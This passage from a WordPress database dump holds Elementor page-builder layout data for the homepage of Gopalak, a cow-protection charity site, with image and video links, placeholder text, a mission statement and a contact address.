here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9252,1589,'_elementor_page_assets','a:0:{}'),(9254,1590,'_elementor_edit_mode','builder'),(9255,1590,'_elementor_template_type','wp-page'),(9256,1590,'_elementor_version','3.7.8'),(9257,1590,'_wp_page_template','elementor_canvas'),(9258,1590,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"d